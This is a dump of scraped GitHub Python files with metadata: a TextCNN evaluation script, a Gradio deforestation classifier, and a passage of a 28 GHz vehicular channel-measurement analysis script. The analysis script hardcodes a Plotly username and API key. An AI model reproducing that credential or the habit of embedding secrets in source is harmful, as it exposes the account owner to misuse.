","repo_name":"PacktPublishing/Practical-Deep-Learning-at-Scale-with-MLFlow","sub_path":"chapter08/sagemaker/query_sagemaker_endpoint.py","file_name":"query_sagemaker_endpoint.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":144,"dataset":"github-code","pt":"7"} +{"seq_id":"16148752393","text":"from text_cnn import TextCNN\nfrom config import FLAGS\nimport tensorflow as tf\nimport data_helper\n\nx_test_data, y_test = data_helper.load_data_and_labels(FLAGS.test_data_file, FLAGS.test_label_file)\n\npadded_sentences_test, max_padding_length = data_helper.padding_sentence(\n sentences=x_test_data,\n padding_sentence_length=FLAGS.padding_sentence_length,\n padding_move=FLAGS.padding_move)\n\nx_test, vocabulary_len = data_helper.embedding_sentences(\n embedding_file=FLAGS.embedding_file, padded_sentences=padded_sentences_test,\n embedding_dimension=FLAGS.embedding_dimension)\n\nprint(\"x_test.shape = {}\".format(x_test.shape))\nprint(\"y_test.shape = {}\".format(y_test.shape))\n\ncnn = TextCNN(sequence_length=FLAGS.padding_sentence_length,\n num_classes=FLAGS.num_classes,\n embedding_dimension=FLAGS.embedding_dimension,\n filter_sizes=list(map(int, FLAGS.filter_size.split(','))),\n num_filters=FLAGS.num_filters,\n l2_reg_lambda=FLAGS.L2_reg_lambda\n )\n\nwith tf.Session() as sess:\n saver = tf.train.Saver()\n saver.restore(sess, tf.train.latest_checkpoint(FLAGS.model_save_path))\n feed_dic = {cnn.input_x: x_test, cnn.input_y: y_test, cnn.dropout_keep_prob: 1.0}\n acc = sess.run(cnn.accuracy, feed_dict=feed_dic)\n print('----acc:{}---'.format(acc))\n","repo_name":"TolicWang/Practice","sub_path":"CNN/TaxCode/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"7"} +{"seq_id":"31627251752","text":"from pathlib import Path\n\nimport gradio as gr\nimport numpy as np\nfrom fastai.vision.all import *\n\n\ndef label(file_name):\n return train_labels[file_name.replace(\".jpg\", \"\")]\n\nconfig = {\n \"labels\": [\n \"Plantation (0)\",\n \"Grassland (1)\",\n \"Smallholder Agriculture (2)\",\n ],\n \"size\": 256,\n}\n\n\n\nlearn = load_learner(\"model.pkl\")\n\ndef classify_image(input):\n _, _, prediction = learn.predict(input)\n outputs = {label: float(prediction[i]) for i, label in enumerate(config[\"labels\"])}\n # Get argmax\n argmax_label = config[\"labels\"][np.argmax(prediction)]\n return argmax_label, round(outputs[argmax_label], 3) * 100\n\n\ngr.Interface(\n fn=classify_image, \n inputs=gr.inputs.Image(shape=(config[\"size\"], config[\"size\"])),\n outputs=[\n gr.outputs.Textbox(label=\"Output of the model\"),\n gr.outputs.Textbox(label=\"Probability (0 - 100)\")\n ],\n examples=[str(x) for x in Path(\"./\").glob(\"*.png\")],\n flagging_options=[\"Correct label\", \"Incorrect label\"],\n allow_flagging=\"manual\",\n).launch()\n","repo_name":"david26694/deforestation","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"31764961066","text":"\"\"\"\r\nThis script encapsulates the operations involved in estimating the propagation parameters associated with the various\r\nMulti-Path Components (MPCs) in our 28 GHz outdoor measurement campaign on the POWDER testbed. It also describes the\r\nvisualizations of the RMS delay- & direction-spread characteristics obtained from this 28 GHz V2X channel modeling.\r\nFurthermore, it includes spatial decoherence analyses w.r.t Tx-Rx distance, alignment, and relative velocity.\r\n\r\nAdditionally, as a part of our evaluations, we incorporate visualizations of the Power Delay Doppler Profiles (PDDPs),\r\nthe Power Delay Angular Profiles (PDAPs), the normalized Doppler spectrum, and the cluster-decay characteristics.\r\n\r\nLastly, we analyze these results for the Saleh-Valenzuela (SV), Quasi-Deterministic (QD), and Device-to-Device (D2D)\r\nchannel models to empirically validate the correctness of such widely-used mmWave channel models.\r\n\r\nReference Papers:\r\n\r\n@INPROCEEDINGS{SAGE,\r\n title={A sliding-correlator-based SAGE algorithm for mmWave wideband channel parameter estimation},\r\n author={Yin, Xuefeng and He, Yongyu and Song, Zinuo and Kim, Myung-Don and Chung, Hyun Kyu},\r\n booktitle={The 8th European Conference on Antennas and Propagation (EuCAP 2014)},\r\n year={2014}, pages={625-629}, doi={10.1109/EuCAP.2014.6901837}}.\r\n\r\n@ARTICLE{Spatial-Consistency-I,\r\n title={Statistical channel impulse response models for factory and open plan building radio system design},\r\n author={Rappaport, T.S. and Seidel, S.Y. and Takamizawa, K.},\r\n journal={IEEE Transactions on Communications},\r\n pages={794-807}, doi={10.1109/26.87142},\r\n year={1991}, volume={39}, number={5}}.\r\n\r\n@INPROCEEDINGS{Spatial-Consistency-II,\r\n author={Sun, Shu and Yan, Hangsong and MacCartney, George R. and Rappaport, Theodore S.},\r\n title={Millimeter wave small-scale spatial statistics in an urban microcell scenario},\r\n booktitle={2017 IEEE Int. Conf. on Commun. (ICC)},\r\n doi={10.1109/ICC.2017.7996408},\r\n pages={1-7}, year={2017}}.\r\n\r\n@INPROCEEDINGS{PDDPs,\r\n title={28-GHz High-Speed Train Measurements and Propagation Characteristics Analysis},\r\n booktitle={2020 14th European Conference on Antennas and Propagation (EuCAP)},\r\n author={Park, Jae-Joon and Lee, Juyul and Kim, Kyung-Won and Kim, Myung-Don},\r\n year={2020}, pages={1-5}, doi={10.23919/EuCAP48036.2020.9135221}}.\r\n\r\n@ARTICLE{PDAPs,\r\n title={Measurement-Based 5G mmWave Propagation Characterization in Vegetated Suburban Macrocell Environments},\r\n author={Zhang, Peize and Yang, Bensheng and Yi, Cheng and Wang, Haiming and You, Xiaohu},\r\n journal={IEEE Transactions on Antennas and Propagation},\r\n year={2020}, volume={68}, number={7}, pages={5556-5567},\r\n doi={10.1109/TAP.2020.2975365}}.\r\n\r\n@ARTICLE{Channel-Models-I,\r\n author={Gustafson, Carl and Haneda, Katsuyuki and Wyne, Shurjeel and Tufvesson, Fredrik},\r\n title={On mm-Wave Multipath Clustering and Channel Modeling},\r\n journal={IEEE Transactions on Antennas and Propagation},\r\n year={2014}, volume={62}, number={3}, pages={1445-1455},\r\n doi={10.1109/TAP.2013.2295836}}\r\n\r\n@INPROCEEDINGS{Channel-Models-II,\r\n author={Gustafson, Carl and Tufvesson, Fredrik and Wyne, Shurjeel and Haneda, Katsuyuki and Molisch, Andreas F.},\r\n title={Directional Analysis of Measured 60 GHz Indoor Radio Channels Using SAGE},\r\n booktitle={2011 IEEE 73rd Vehicular Technology Conference (VTC Spring)},\r\n year={2011}, volume={}, number={}, pages={1-5},\r\n doi={10.1109/VETECS.2011.5956639}}\r\n\r\n@INPROCEEDINGS{Channel-Models-III,\r\n author={Lecci, Mattia and Polese, Michele and Lai, Chiehping and Wang, Jian and Gentile, Camillo and Golmie, et al.},\r\n title={Quasi-Deterministic Channel Model for mmWaves: Mathematical Formalization and Validation},\r\n booktitle={GLOBECOM 2020 - 2020 IEEE Global Communications Conference},\r\n year={2020}, pages={1-6}, doi={10.1109/GLOBECOM42002.2020.9322374}}\r\n\r\n\r\nAuthor: Bharath Keshavamurthy \r\nOrganization: School of Electrical and Computer Engineering, Purdue University, West Lafayette, IN\r\n School of Electrical, Computer and Energy Engineering, Arizona State University, Tempe, AZ\r\n\r\nCopyright (c) 2023. All Rights Reserved.\r\n\"\"\"\r\n\r\nimport os\r\nimport re\r\nimport json\r\nimport plotly\r\nimport requests\r\nimport datetime\r\nimport scipy.io\r\nimport traceback\r\n# import functools\r\nimport dataclasses\r\nimport numpy as np\r\n# import cvxpy as cp\r\nfrom enum import Enum\r\nfrom geopy import distance\r\nimport plotly.graph_objs as go\r\nfrom json import JSONDecodeError\r\nfrom dataclasses import dataclass\r\nfrom scipy import signal, constants\r\nfrom typing import Tuple, List, Dict\r\n# from scipy.interpolate import interp1d\r\n# from dataclasses import dataclass, field\r\nimport sk_dsp_comm.fir_design_helper as fir_d\r\nfrom concurrent.futures import ThreadPoolExecutor\r\n\r\n\"\"\"\r\nINITIALIZATIONS I: Collections & Utilities\r\n\"\"\"\r\npi, c, distns, alignments, velocities = np.pi, constants.c, [], [], []\r\ndeg2rad, rad2deg = lambda x: x * (pi / 180.0), lambda x: x * (180.0 / pi)\r\nlinear_1, linear_2 = lambda x: 10 ** (x / 10.0), lambda x: 10 ** (x / 20.0)\r\nrx_gps_events, tx_imu_traces, rx_imu_traces, pdp_segments, pods = [], [], [], [], []\r\ndecibel_1, decibel_2, gamma = lambda x: 10 * np.log10(x), lambda x: 20 * np.log10(x), lambda fc, fc_: fc / (fc - fc_)\r\n\r\n\"\"\"\r\nINITIALIZATIONS II: Enumerations & Dataclasses (Inputs)\r\n\"\"\"\r\n\r\n\r\nclass Units(Enum):\r\n METERS = 0\r\n CENTIMETERS = 1\r\n MILLIMETERS = 2\r\n DEGREES = 3\r\n MINUTES = 4\r\n SECONDS = 5\r\n INCHES = 6\r\n FEET = 7\r\n YARDS = 8\r\n DIMENSIONLESS = 9\r\n UNKNOWN = 10\r\n\r\n\r\nclass FixType(Enum):\r\n NO_FIX = 0\r\n DEAD_RECKONING = 1\r\n TWO_DIMENSIONAL = 2\r\n THREE_DIMENSIONAL = 3\r\n GNSS = 4\r\n TIME_FIX = 5\r\n\r\n\r\nclass CarrierSolutionType(Enum):\r\n NO_SOLUTION = 0\r\n FLOAT_SOLUTION = 1\r\n FIXED_SOLUTION = 2\r\n\r\n\r\n@dataclass(order=True)\r\nclass Member:\r\n is_high_precision: bool = False\r\n main_component: float = 0.0\r\n high_precision_component: float = 0.0\r\n component: float = 0.0\r\n precision: float = 0.0\r\n units: Units = Units.DIMENSIONLESS\r\n\r\n\r\n@dataclass(order=True)\r\nclass GPSEvent:\r\n seq_number: int = 0\r\n timestamp: str = str(datetime.datetime.utcnow())\r\n is_gnss_fix_ok: bool = False\r\n siv: int = 0\r\n fix_type: FixType = FixType.NO_FIX\r\n carrier_solution_type: CarrierSolutionType = CarrierSolutionType.NO_SOLUTION\r\n latitude: Member = Member() # components: deg\r\n longitude: Member = Member() # components: deg\r\n altitude_ellipsoid: Member = Member() # components: m\r\n altitude_msl: Member = Member() # components: m\r\n speed: Member = Member() # components: ms-1\r\n heading: Member = Member()\r\n horizontal_acc: Member = Member() # components: ms-2\r\n vertical_acc: Member = Member() # components: ms-2\r\n speed_acc: Member = Member()\r\n heading_acc: Member = Member()\r\n ned_north_vel: Member = Member()\r\n ned_east_vel: Member = Member()\r\n ned_down_vel: Member = Member()\r\n pdop: Member = Member()\r\n mag_acc: Member = Member()\r\n mag_dec: Member = Member()\r\n geometric_dop: Member = Member()\r\n position_dop: Member = Member()\r\n time_dop: Member = Member()\r\n horizontal_dop: Member = Member()\r\n vertical_dop: Member = Member()\r\n northing_dop: Member = Member()\r\n easting_dop: Member = Member()\r\n horizontal_accuracy: Member = Member() # components: ms-2\r\n vertical_accuracy: Member = Member() # components: m\r\n ultra_core_length: int = 16\r\n core_length: int = 37\r\n total_length: int = 39\r\n\r\n\r\n@dataclass(order=True)\r\nclass IMUTrace:\r\n seq_number: int = 0\r\n timestamp: str = str(datetime.datetime.utcnow())\r\n yaw_angle: float = 0.0 # deg\r\n pitch_angle: float = 0.0 # deg\r\n\r\n\r\n\"\"\"\r\nCONFIGURATIONS: A few route-specific Plotly visualization options\r\n Input & Output Dirs | GPS & IMU logs | Power delay profiles\r\n\"\"\"\r\n\r\n''' urban-campus-I route (semi-autonomous) (1400 E St) '''\r\ncomm_dir = 'E:/SPAVE-28G/analyses/urban-campus-I/rx-realm/pdp/'\r\nrx_gps_dir = 'E:/SPAVE-28G/analyses/urban-campus-I/rx-realm/gps/'\r\nrx_imu_dir = 'E`:/SPAVE-28G/analyses/urban-campus-I/rx-realm/imu/'\r\ntx_imu_dir, tx_imu_skip_step = 'E:/SPAVE-28G/analyses/urban-campus-I/tx-realm/imu/', 1\r\n# rms_delay_spread_png, aoa_rms_dir_spread_png = 'uc_rms_delay_spread.png', 'uc_aoa_rms_dir_spread.png'\r\nsc_distance_png, sc_alignment_png, sc_velocity_png = 'uc_sc_dist.png', 'uc_sc_alignment.png', 'uc_sc_vel.png'\r\n\r\n''' urban-campus-II route (fully-autonomous) (President's Circle) '''\r\n# comm_dir = 'E:/SPAVE-28G/analyses/urban-campus-II/rx-realm/pdp/'\r\n# rx_gps_dir = 'E:/SPAVE-28G/analyses/urban-campus-II/rx-realm/gps/'\r\n# rx_imu_dir = 'E:/SPAVE-28G/analyses/urban-campus-II/rx-realm/imu/'\r\n# tx_imu_dir, tx_imu_skip_step = 'E:/SPAVE-28G/analyses/urban-campus-II/tx-realm/imu/', 5\r\n# rms_delay_spread_png, aoa_rms_dir_spread_png = 'ucc_rms_delay_spread.png', 'ucc_aoa_rms_dir_spread.png'\r\n# sc_distance_png, sc_alignment_png, sc_velocity_png = 'ucc_sc_dist.png', 'ucc_sc_alignment.png', 'ucc_sc_vel.png'\r\n\r\n''' urban-campus-III route (fully-autonomous) (100 S St) '''\r\n# comm_dir = 'E:/SPAVE-28G/analyses/urban-campus-III/rx-realm/pdp/'\r\n# rx_gps_dir = 'E:/SPAVE-28G/analyses/urban-campus-III/rx-realm/gps/'\r\n# rx_imu_dir = 'E:/SPAVE-28G/analyses/urban-campus-III/rx-realm/imu/'\r\n# tx_imu_dir, tx_imu_skip_step = 'E:/SPAVE-28G/analyses/urban-campus-III/tx-realm/imu/', 5\r\n# rms_delay_spread_png, aoa_rms_dir_spread_png = 'uccc_rms_delay_spread.png', 'uccc_aoa_rms_dir_spread.png'\r\n# sc_distance_png, sc_alignment_png, sc_velocity_png = 'uccc_sc_dist.png', 'uccc_sc_alignment.png', 'uccc_sc_vel.png'\r\n\r\n''' urban-garage route (fully-autonomous) (NW Garage on 1460 E St) '''\r\n# comm_dir = 'E:/SPAVE-28G/analyses/urban-garage/rx-realm/pdp/'\r\n# rx_gps_dir = 'E:/SPAVE-28G/analyses/urban-garage/rx-realm/gps/'\r\n# rx_imu_dir = 'E:/SPAVE-28G/analyses/urban-garage/rx-realm/imu/'\r\n# tx_imu_dir, tx_imu_skip_step = 'E:/SPAVE-28G/analyses/urban-garage/tx-realm/imu/', 1\r\n# rms_delay_spread_png, aoa_rms_dir_spread_png = 'ug_rms_delay_spread.png', 'ug_aoa_rms_dir_spread.png'\r\n# sc_distance_png, sc_alignment_png, sc_velocity_png = 'ug_sc_distance.png', 'ug_sc_alignment.png', 'ug_sc_velocity.png'\r\n\r\n''' urban-stadium route (fully-autonomous) (E South Campus Dr) '''\r\n# comm_dir = 'E:/SPAVE-28G/analyses/urban-stadium/rx-realm/pdp/'\r\n# rx_gps_dir = 'E:/SPAVE-28G/analyses/urban-stadium/rx-realm/gps/'\r\n# rx_imu_dir = 'E:/SPAVE-28G/analyses/urban-stadium/rx-realm/imu/'\r\n# tx_imu_dir, tx_imu_skip_step = 'E:/SPAVE-28G/analyses/urban-stadium/tx-realm/imu/', 5\r\n# rms_delay_spread_png, aoa_rms_dir_spread_png = 'us_rms_delay_spread.png', 'us_aoa_rms_dir_spread.png'\r\n# sc_distance_png, sc_alignment_png, sc_velocity_png = 'us_sc_distance.png', 'us_sc_alignment.png', 'us_sc_velocity.png'\r\n\r\n''' suburban-fraternities route (fully-autonomous) (S Wolcott St) '''\r\n# comm_dir = 'E:/SPAVE-28G/analyses/suburban-fraternities/rx-realm/pdp/'\r\n# rx_gps_dir = 'E:/SPAVE-28G/analyses/suburban-fraternities/rx-realm/gps/'\r\n# rx_imu_dir = 'E:/SPAVE-28G/analyses/suburban-fraternities/rx-realm/imu/'\r\n# tx_imu_dir, tx_imu_skip_step = 'E:/SPAVE-28G/analyses/suburban-fraternities/tx-realm/imu/', 1\r\n# rms_delay_spread_png, aoa_rms_dir_spread_png = 'sf_rms_delay_spread.png', 'sf_aoa_rms_dir_spread.png'\r\n# sc_distance_png, sc_alignment_png, sc_velocity_png = 'sf_sc_distance.png', 'sf_sc_alignment.png', 'sf_sc_velocity.png'\r\n\r\n''' urban-vegetation route (fully-autonomous) (Olpin Union Bldg) '''\r\n# comm_dir = 'E:/SPAVE-28G/analyses/urban-vegetation/rx-realm/pdp/'\r\n# rx_gps_dir = 'E:/SPAVE-28G/analyses/urban-vegetation/rx-realm/gps/'\r\n# rx_imu_dir = 'E:/SPAVE-28G/analyses/urban-vegetation/rx-realm/imu/'\r\n# tx_imu_dir, tx_imu_skip_step = 'E:/SPAVE-28G/analyses/urban-vegetation/tx-realm/imu/', 1\r\n# rms_delay_spread_png, aoa_rms_dir_spread_png = 'uv_rms_delay_spread.png', 'uv_aoa_rms_dir_spread.png'\r\n# sc_distance_png, sc_alignment_png, sc_velocity_png = 'uv_sc_distance.png', 'uv_sc_alignment.png', 'uv_sc_velocity.png'\r\n\r\n''' Tx location fixed on the rooftop of the William Browning Building in SLC, UT '''\r\ntx_gps_event = GPSEvent(latitude=Member(component=40.766173670),\r\n longitude=Member(component=-111.847939330), altitude_ellipsoid=Member(component=1459.1210))\r\n\r\n''' Generic configurations '''\r\n# output_dir = 'E:/Workspace/SPAVE-28G/test/analyses/'\r\nant_log_file = 'E:/SPAVE-28G/analyses/antenna_pattern.mat'\r\n# n_sigma, max_ant_gain, pn_reps, max_mpcs = 0.015, 22.0, 100\r\nne_amp_threshold, max_workers, sg_wsize, sg_poly_order = 0.05, 4096, 53, 3\r\nmin_threshold, sample_rate, datetime_format = 1e5, 2e6, '%Y-%m-%d %H:%M:%S.%f'\r\nd_max, d_step, a_max, a_step, v_max, v_step = 500.0, 1.0, 10.0, 0.05, 10.0, 0.1\r\n# delay_tol, doppler_tol, att_tol, aoa_az_tol, aoa_el_tol = 1e-9, 1.0, 0.1, 0.1, 0.1\r\nplotly.tools.set_credentials_file(username='bkeshava_bkeshav1', api_key='hspqOdIFQcnHdlL7MGch')\r\n# tau_min, tau_max, nu_min, nu_max, phi_min, phi_max, the_min, the_max = 1e-9, 1e-6, 0.0, 1e3, -pi, pi, -pi, pi\r\ntime_windowing_config = {'window_multiplier': 2.0, 'truncation_length': int(2e5), 'truncation_multiplier': 4.0}\r\n# tx_fc, rx_fc, pn_v0, pn_l, pn_m, wlength, pn_reps = 400e6, 399.95e6, 0.5, 11, 2047, c / 28e9, int(pn_m / pn_l)\r\npdp_samples_file, start_timestamp_file, parsed_metadata_file = 'samples.log', 'timestamp.log', 'parsed_metadata.log'\r\nprefilter_config = {'passband_freq': 60e3, 'stopband_freq': 65e3, 'passband_ripple': 0.01, 'stopband_attenuation': 80.0}\r\n\r\n\"\"\"\r\nINITIALIZATIONS III: Enumerations & Dataclasses (Temps | Outputs)\r\n\"\"\"\r\n\r\n\"\"\"\r\n@dataclass(order=True)\r\nclass MPCParameters:\r\n path_number: int = 0\r\n delay: float = 0.0 # s\r\n aoa_azimuth: float = 0.0 # rad\r\n aoa_elevation: float = 0.0 # rad\r\n doppler_shift: float = 0.0 # Hz\r\n profile_point_power: float = 0.0 # linear\r\n attenuation: float = complex(0.0, 0.0) # linear (complex)\r\n\"\"\"\r\n\r\n\r\n@dataclass(order=True)\r\nclass PDPSegment:\r\n seq_number: int = 0\r\n timestamp: str = str(datetime.datetime.utcnow())\r\n sample_rate: float = 2e6 # sps\r\n rx_freq: float = 2.5e9 # Hz\r\n item_size: int = 8\r\n core_header_length: int = 149\r\n extra_header_length: int = 22\r\n header_length: int = 171\r\n num_samples: int = int(1e6)\r\n num_bytes: int = num_samples * item_size\r\n raw_rx_samples: np.array = np.array([], dtype=np.csingle) # complex I/Q-64\r\n processed_rx_samples: np.array = np.array([], dtype=np.csingle) # complex I/Q-64\r\n correlation_peak: float = 0.0 # linear\r\n\r\n\r\n@dataclass(order=True)\r\nclass Pod:\r\n seq_number: int = 0\r\n timestamp: str = str(datetime.datetime.utcnow())\r\n tx_gps_event: GPSEvent = GPSEvent()\r\n rx_gps_event: GPSEvent = GPSEvent()\r\n tx_imu_trace: IMUTrace = IMUTrace()\r\n rx_imu_trace: IMUTrace = IMUTrace()\r\n tx_elevation: float = 0.0 # m\r\n rx_elevation: float = 0.0 # m\r\n tx_rx_alignment: float = 0.0 # deg\r\n tx_rx_distance_2d: float = 0.0 # m\r\n tx_rx_distance_3d: float = 0.0 # m\r\n pdp_segment: PDPSegment = PDPSegment()\r\n # n_mpcs: int = max_mpcs\r\n # mpc_parameters: List[MPCParameters] = field(default_factory=lambda: (MPCParameters() for _ in range(max_mpcs)))\r\n rms_delay_spread: float = 0.0 # s\r\n rms_aoa_dir_spread: float = 0.0 # no-units (normalized)\r\n\r\n\r\n\"\"\"\r\nCORE ROUTINES\r\n\"\"\"\r\n\r\n\r\n# Pack a dictionary into a dataclass instance\r\ndef ddc_transform(d: Dict, dc: dataclass) -> dataclass:\r\n d_l, d_f = {}, {f.name: f.type for f in dataclasses.fields(dc)}\r\n\r\n for k, v in d.items():\r\n d_l[k] = (lambda: v, lambda: ddc_transform(v, Member))[d_f[k] == Member]()\r\n\r\n return dc(**d_l)\r\n\r\n\r\n# Parse the provided file and store it in the given collection\r\ndef parse(d: List, dc: dataclass, fn: str) -> None:\r\n with open(fn) as f:\r\n d.append(ddc_transform(json.load(f), dc))\r\n\r\n\r\n# Yaw angle getter (deg)\r\ndef yaw(m: IMUTrace) -> float:\r\n return m.yaw_angle\r\n\r\n\r\n# Pitch angle getter (deg)\r\ndef pitch(m: IMUTrace) -> float:\r\n return m.pitch_angle\r\n\r\n\r\n# Latitude getter (deg)\r\ndef latitude(y: GPSEvent) -> float:\r\n return y.latitude.component\r\n\r\n\r\n# Longitude getter (deg)\r\ndef longitude(y: GPSEvent) -> float:\r\n return y.longitude.component\r\n\r\n\r\n# Altitude getter (m)\r\ndef altitude(y: GPSEvent) -> float:\r\n return y.altitude_ellipsoid.component\r\n\r\n\r\n# Tx-Rx 2D distance (m)\r\ndef tx_rx_distance_2d(tx: GPSEvent, rx: GPSEvent) -> float:\r\n coords_tx = (latitude(tx), longitude(tx))\r\n coords_rx = (latitude(rx), longitude(rx))\r\n return distance.distance(coords_tx, coords_rx).m\r\n\r\n\r\n# Tx-Rx 3D distance (m)\r\ndef tx_rx_distance_3d(tx: GPSEvent, rx: GPSEvent) -> float:\r\n alt_tx, alt_rx = altitude(tx), altitude(rx)\r\n return np.sqrt(np.square(tx_rx_distance_2d(tx, rx)) + np.square(alt_tx - alt_rx))\r\n\r\n\r\n# General 3D distance (m)\r\ndef distance_3d(y1: GPSEvent, y2: GPSEvent) -> float:\r\n coords_y1 = (latitude(y1), longitude(y1))\r\n coords_y2 = (latitude(y2), longitude(y2))\r\n alt_y1, alt_y2 = altitude(y1), altitude(y2)\r\n distance_2d = distance.distance(coords_y1, coords_y2).m\r\n return np.sqrt(np.square(distance_2d) + np.square(alt_y1 - alt_y2))\r\n\r\n\r\n# Tx-Rx difference in alignment (deg)\r\ndef d_alignment(y1: GPSEvent, y2: GPSEvent, m: IMUTrace, is_tx=True) -> Tuple:\r\n y1_lat, y1_lon, y1_alt = latitude(y1), longitude(y1), altitude(y1)\r\n y2_lat, y2_lon, y2_alt = latitude(y2), longitude(y2), altitude(y2)\r\n\r\n '''\r\n Modeled from RxRealms.py - Utilities.py | principal_axes_positioning\r\n '''\r\n\r\n if is_tx:\r\n yaw_calc = rad2deg(np.arctan((y1_lat - y2_lat) / (np.cos(deg2rad(y1_lat)) * (y1_lon - y2_lon))))\r\n else:\r\n yaw_calc = rad2deg(np.arctan((y2_lat - y1_lat) / (np.cos(deg2rad(y2_lat)) * (y2_lon - y1_lon))))\r\n\r\n if y1_lat <= y2_lat:\r\n yaw_calc += 270.0 if yaw_calc >= 0.0 else 90.0\r\n else:\r\n yaw_calc += 90.0 if yaw_calc >= 0.0 else 270.0\r\n\r\n pitch_calc = rad2deg(np.arctan((y2_alt - y1_alt) / abs(np.cos(deg2rad(y1_lat)) * (y1_lon - y2_lon))))\r\n pitch_calc /= 2\r\n\r\n if is_tx:\r\n pitch_calc *= (pitch_calc * -30.0 if pitch_calc < 0.0 else 30.0) / (pitch_calc * pitch_calc)\r\n else:\r\n pitch_calc *= (pitch_calc * -5.0 if pitch_calc < 0.0 else 5.0) / (pitch_calc * pitch_calc)\r\n\r\n return abs(yaw(m) - yaw_calc), abs(pitch(m) - pitch_calc)\r\n\r\n\r\n# Tx-Rx overall relative alignment accuracy (deg)\r\ndef tx_rx_alignment(tx: GPSEvent, rx: GPSEvent, m_tx: IMUTrace, m_rx: IMUTrace) -> float:\r\n m_tx_yaw_, m_tx_pitch_ = d_alignment(tx, rx, m_tx)\r\n m_rx_yaw_, m_rx_pitch_ = d_alignment(rx, tx, m_rx, False)\r\n return max(abs(180.0 - m_tx_yaw_ - m_rx_yaw_), abs(180.0 - m_tx_pitch_ - m_rx_pitch_))\r\n\r\n\r\n# Tx-Rx relative velocity (ms-1) [N&W hemispheres only]\r\n# TO-DO: Instead of using lat & long relative movements, use the Tx & Rx headings from the GPS logs.\r\ndef tx_rx_relative_velocity(tx: GPSEvent, rx_i: GPSEvent, rx_j: GPSEvent) -> float:\r\n rx_i_lat, rx_i_lon = latitude(rx_i), longitude(rx_i)\r\n rx_j_lat, rx_j_lon = latitude(rx_j), longitude(rx_j)\r\n rx_ds = distance.distance((rx_i_lat, rx_i_lon), (rx_j_lat, rx_j_lon)).m\r\n\r\n rx_i_dt = datetime.datetime.strptime(rx_i.timestamp, datetime_format)\r\n rx_j_dt = datetime.datetime.strptime(rx_j.timestamp, datetime_format)\r\n rx_dt = abs((rx_j_dt - rx_i_dt).seconds)\r\n\r\n if rx_dt == 0.0:\r\n return 0.0\r\n\r\n rx_v = rx_ds / rx_dt\r\n\r\n if tx_rx_distance_2d(tx, rx_i) > tx_rx_distance_2d(tx, rx_j):\r\n rx_v *= -1 # Multiply by -1 if the Rx is going towards the Tx...\r\n\r\n return rx_v\r\n\r\n\r\n# USGS EPQS: Tx/Rx elevation (m)\r\ndef elevation(y: GPSEvent) -> float:\r\n elev_url, elev_val = '', 0.0\r\n lat, lon, alt = latitude(y), longitude(y), altitude(y)\r\n base_epqs_url = ('https://epqs.nationalmap.gov/v1/json?'\r\n 'x={}&y={}&units=Meters&wkid=4326&includeDate=False')\r\n\r\n while True:\r\n try:\r\n elev_url = base_epqs_url.format(lon, lat)\r\n elev_val = abs(alt - float(requests.get(elev_url).json()['value']))\r\n except KeyError as ke:\r\n print('SPAVE-28G | Consolidated Processing II | KeyError caught while getting elevation data '\r\n 'from URL: {} | Retrying... | Traceback: {}'.format(elev_url, traceback.print_tb(ke.__traceback__)))\r\n continue # Retry querying the USGS EPQS URL for accurate elevation data...\r\n except JSONDecodeError as jde_:\r\n print('SPAVE-28G | Consolidated Processing II | JSONDecodeError caught while getting elevation data '\r\n 'from URL: {} | Retrying... | Traceback: {}'.format(elev_url, traceback.print_tb(jde_.__traceback__)))\r\n continue # Retry querying the USGS EPQS URL for accurate elevation data...\r\n except Exception as e_:\r\n print('SPAVE-28G | Consolidated Processing II | Exception caught while getting elevation data '\r\n 'from URL: {} | Retrying... | Traceback: {}'.format(elev_url, traceback.print_tb(e_.__traceback__)))\r\n continue # Retry querying the USGS EPQS URL for accurate elevation data...\r\n break\r\n\r\n return elev_val\r\n\r\n\r\n\"\"\"\r\n# Cartesian coordinates to Spherical coordinates (x, y, z) -> (r, phi, theta) radians\r\ndef cart2sph(x: float, y: float, z: float) -> Tuple:\r\n return np.sqrt((x ** 2) + (y ** 2) + (z ** 2)), np.arctan2(y, x), np.arctan2(z, np.sqrt((x ** 2) + (y ** 2)))\r\n\"\"\"\r\n\r\n\"\"\"\r\n# Spherical coordinates to Cartesian coordinates -> (r, phi, theta) radians -> (x, y, z)\r\ndef sph2cart(r: float, phi: float, theta: float) -> Tuple:\r\n return r * np.sin(theta) * np.cos(phi), r * np.sin(theta) * np.sin(phi), r * np.cos(theta)\r\n\"\"\"\r\n\r\n\r\n# Process the power-delay-profiles recorded at the receiver\r\ndef process_rx_samples(x: np.array) -> Tuple:\r\n fs, ne_th = sample_rate, ne_amp_threshold\r\n f_pass, f_stop, d_pass, d_stop = prefilter_config.values()\r\n t_win_mul, t_trunc_len, t_trunc_mul = time_windowing_config.values()\r\n\r\n # Frequency Manipulation: Pre-filtering via a Low Pass Filter (LPF)\r\n b = fir_d.fir_remez_lpf(fs=fs, f_pass=f_pass, f_stop=f_stop, d_pass=d_pass, d_stop=d_stop)\r\n samps = signal.lfilter(b=b, a=1, x=x, axis=0)\r\n\r\n # Temporal Manipulation I: Temporal truncation\r\n samps = samps[t_trunc_len:] if samps.shape[0] > (t_trunc_mul * t_trunc_len) else samps\r\n\r\n # Temporal Manipulation II: Time-windowing\r\n window_size, n_samples = int(fs * t_win_mul), samps.shape[0]\r\n samps = samps[int(0.5 * window_size):int(1.5 * window_size)] if n_samples > 2 * window_size else samps\r\n\r\n # Noise Elimination: The peak search method is 'TallEnoughAbs'\r\n ne_samps = np.squeeze(samps[np.array(np.where(np.abs(samps) > ne_th * np.max(np.abs(samps))), dtype=int)])\r\n\r\n return ne_samps.shape[0], ne_samps\r\n\r\n\r\n# Correlation peak in the processed rx_samples (linear)\r\ndef correlation_peak(x: np.array) -> float:\r\n return np.max(np.abs(x))\r\n\r\n\r\n\"\"\"\r\n# RMS delay spread computation (std | s)\r\n# See Visualizations-I: [https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6691924]\r\ndef rms_delay_spread(mpcs: List[MPCParameters]) -> float:\r\n num1, num2, den = [], [], []\r\n\r\n for mpc in mpcs:\r\n tau, p_tau = mpc.delay, mpc.profile_point_power\r\n num1.append(np.square(tau) * p_tau)\r\n num2.append(tau * p_tau)\r\n den.append(p_tau)\r\n\r\n num1_sum, 